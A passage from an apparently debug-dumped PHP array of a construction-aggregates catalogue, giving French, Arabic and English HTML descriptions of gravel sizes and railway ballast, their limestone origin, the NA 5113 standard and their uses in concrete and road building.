<li style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The<strong> Gravel 4/8 mm </strong>is<strong> </strong>used bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</span></span></p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> </span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>Recommendations</strong></u><strong> :</strong></span></span></span></small></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611822434.png',
'img_prd_detail' => '',
'Code_Pr' => '485',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611737456.pdf',
'pos_slider' => '6'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 4 => array(
'Produit' => array(
'id' => '125',
'nom_fr' => 'Gravier ',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '8/15 mm',
'sous_nom_ara' => ' 8/15 مم',
'sous_nom_en' => '8/15 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Gravier</strong> <strong>8/15 mm</strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Gravier</strong> <strong>8/15 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Gravier</strong> <strong>8/15 mm</strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="color:#008000"><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></small></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></li>
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام <span style="color:#000000">تتكيف</span> مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><u><span style="color:#008000"><strong>Uses</strong></span></u><span style="color:#008000"><strong> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm </span></small></strong><small><span style="font-size:16px">is</span></small><strong><small><span style="font-size:16px"> </span></small></strong></span>used bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span> is included in :</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> </span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong> Hydraulic Concrete</strong></span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><u><strong>Recommendations</strong></u><strong> :</strong></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611737181.png',
'img_prd_detail' => '',
'Code_Pr' => '125',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611737181.pdf',
'pos_slider' => '5'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 5 => array(
'Produit' => array(
'id' => '489',
'nom_fr' => 'Gravier',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '15/25 mm',
'sous_nom_ara' => ' 25/15 مم',
'sous_nom_en' => '15/25 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Gravier</strong> <strong>15/25 mm</strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Gravier</strong> <strong>15/25 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Gravier</strong> <strong>15/25 mm</strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></strong><span style="font-size:18px"><strong><small> :</small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></span></span></strong></li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <u><span style="color:#008000"><strong> </strong></span></u></span></span><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm </span></small></strong><small><span style="font-size:16px">is u</span></small></span>sed bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span></p>
</li>
</ul>
<ul>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong> Hydraulic Concrete</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><u><strong>Recommendations:</strong></u></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611736339.png',
'img_prd_detail' => '',
'Code_Pr' => '489',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611736339.pdf',
'pos_slider' => '4'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 6 => array(
'Produit' => array(
'id' => '9959',
'nom_fr' => 'Gravier Ballast',
'nom_ara' => ' حصى الصابورة Ballast حصى',
'nom_en' => 'Gravel Ballast',
'sous_nom_fr' => '25/50 mm',
'sous_nom_ara' => '50/25 مم',
'sous_nom_en' => '25/50 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong> est </span>le lit de pierres ou de graviers sur lequel repose une voie de chemin de fer.</span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif">désigne le mélange de cailloux et de sable répandu sur le sol, sous la voie ferrée. Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> est entré dans l’usage et a supplanté ensablement. </span></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Les éléments du <strong>Gravier Ballast </strong></span></span><span style="font-family:times new roman,times,serif"><span style="color:#000000"> généralement utilisés: de la pierre concassée, de </span><a href="https://fr.wikipedia.org/wiki/Granulom%C3%A9trie" title="Granulométrie"><span style="color:#000000">g</span></a><span style="color:#000000">ranulométrie variant entre 31,5 et 50 mm. Le type de roches utilisées varie suivant les régions et pays en fonction du climat. On trouve des roches de type plutonique : granite, diorite, etc. </span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Les éléments du </span></span><span style="color:#000000"><span style="font-family:times new roman,times,serif"><strong>Gravier Ballast </strong> doivent s'imbriquer de façon à former une masse compacte mais perméable.</span></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></span></p>
<p><span style="color:#008000"><u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Utilisations</span></span></strong></u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></strong></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong></span></span><span style="font-family:times new roman,times,serif"><strong> </strong>est utilisé dans les :</span></span> </p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><strong>Voies Ferroviaires<em> </em></strong></span></small></span></span></p>
</li>
</ul>
<p><span style="color:#008000"><span style="font-size:16px"><u><strong><span style="font-family:times new roman,times,serif">Contraintes</span></strong></u><strong><span style="font-family:times new roman,times,serif"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> subit deux types d'usure :</span></span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Contamination par des matériaux parasites, par exemple de la terre. On procède à des désherbages, mais il est nécessaire de remplacer le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> régulièrement ;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Tassement du <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> sous les traverse; il provoque une déformation verticale de la voie. Il est nécessaire de réinjecter du <strong>Gravier Ballast</strong> de faible granulométrie sous les traverses; ou bien de réaliser une opération d'entretien à l'aide d'une bourreuse. Ce genre d'opération se réalise environ tous les sept ans.</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">On tamise le <strong>Gravier Ballast</strong> chaque vingtaine d'années pour remplacer les pierres brisées. Le <strong>Gravier Ballast</strong> présente une durée d'utilisation d'une quarantaine d'années avant de devoir être intégralement remplacé.</span></span></span></p>
<p> </p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة </strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25/50 مم</strong> هو </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">طبقة</span></span></small> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحجارة أو الحصى الذي يرتكز عليه مسار سكة الحديد.</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">ت</span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px">شير </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> إلى خليط الحصى والرمل المنتشر على الأرض أو أسفل خطوط السكك الحديدية.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">حلت </span><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong></span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> محل الطمي عندما دخلت حيز الاستخدام.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">العناصرالمستخدمة في</span></span><span style="font-size:16px"><strong> حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> بشكل عام : الحجر المسحوق ، بحجم حبة يتراوح بين 31.5 و 50 مم. يختلف نوع الصخور المستخدمة باختلاف المناطق والبلدان اعتمادًا على المناخ. توجد صخور من النوع الجوفي: الجرانيت ، الديوريت ، إلخ. </span></span></span></p>
